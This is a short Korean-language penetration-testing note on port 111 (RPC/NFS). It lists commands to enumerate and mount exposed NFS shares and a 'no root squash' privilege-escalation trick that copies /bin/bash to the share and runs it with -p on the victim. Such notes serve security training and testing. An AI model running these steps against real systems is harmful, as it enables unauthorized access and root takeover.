111 - RPC

RPC 포트는 원격에서 디렉토리를 마운트하여 파일 공유를 할 수 있는 프로토콜입니다. 마운트 된 쉐어에 대한 정보 수집과, 권한이 있을 시 마운트를 하여 정보수집, 스피어 피싱, 악성파일 업로드 등과 같은 행위를 할 수 있고, No root squash 설정이 되어있을 경우 실행파일을 통해 루트 권한 획득도 가능합니다.

# 쉐어 목록 확인
showmount -e <IP>

# 쉐어와 마운트
mount <IP>:/<Share> /mnt

# no root squash 악용
[Kali] cp /bin/bash /mnt/
[Victim] ./bash -p